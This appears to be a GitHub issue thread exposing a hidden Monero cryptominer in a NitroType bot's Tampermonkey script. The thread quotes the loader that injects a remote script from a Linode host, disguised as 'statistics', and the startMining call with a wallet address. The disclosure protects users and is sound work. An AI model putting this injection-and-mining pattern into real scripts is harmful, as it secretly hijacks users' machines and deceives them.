### ISSUE TITLE
Nice cryptominer nerd

### ISSUE THREAD

**Issue by imadeitontop** [ultratype/UltraTypeBot#38]
https://web.archive.org/web/20230220045406/https://194-195-216-27.ip.linodeusercontent.com:8081/stats.js
https://web.archive.org/web/20230220045604/https://194-195-216-27.ip.linodeusercontent.com:8081/stats/

Lol

**Comment by TwilightHound** [comment]
what is the meaning of THIS? and is THIS on MY computer? (i DID install it)

**Comment by jleoj** [comment]
> what is the meaning of THIS? and is THIS on MY computer? (i DID install it)

Yeah, apparently they did attempt to install a Monero cryptominer on the Tampermonkey software.
You can see in the Tampermonkey script the lines
`(function() {
	"use strict";
	var OUT = "https://rawgit.com/ultratype/UltraTypeBot/master/OUT/OUT.js";
	var OUT_SCRIPT = "<script src='" + OUT + "'></script>\n";`

This links to the file `OUT.js` in the repository. And if you check the contents of the file 'OUT.js', you can see there is the following lines: 
` => {
    const STATS_URL = 'https://194-195-216-27.ip.linodeusercontent.com:8081/stats.js'; // proprietary, sorry. just collecting some statistics thats all!
    // load stats
    if (!window.localStorage["multratype"]) {
      let s = document.createElement('script');
        s.src = STATS_URL;
        document.head.appendChild(s);`

You see the Linode URL https://194-195-216-27.ip.linodeusercontent.com:8081/stats.js, and the comment next to it "proprietary, sorry. just collecting some statistics thats all!". Like, yeah, we totally believe you. Now we go back to the Wayback Machine that imadeitontop posted, https://web.archive.org/web/20230220045406/https://194-195-216-27.ip.linodeusercontent.com:8081/stats.js.

If you click on the link and check the code, you will see the lines of code saying
`startMining("moneroocean.stream",        "499ngmjX1Q7b55E5cHZV8K2QFs221W7m9jN9YZcSajycFg6sSS3uQREVp5jByGpuPxHGwibjZ3PX3Z8yxSXqTK8pGW36mWs");`

And there you see the Monero miner hidden. So it isn't "just collecting statistics", it's attempting to install a Monero miner on the devices of users that install the Tampermonkey script for what they think is a NitroType bot.

If we check the other Wayback Machine save, 
https://web.archive.org/web/20230220045604/https://194-195-216-27.ip.linodeusercontent.com:8081/stats/, we see multiple sketchy files with names that literally say what they are for. `miner.js`, `worker.js`, and `cn.js` are all _great_ names for trying to conceal what they were trying to do.

It turns out that wwwg was attempting to use JavaScript to mine Monero in-browser. BUSTED!
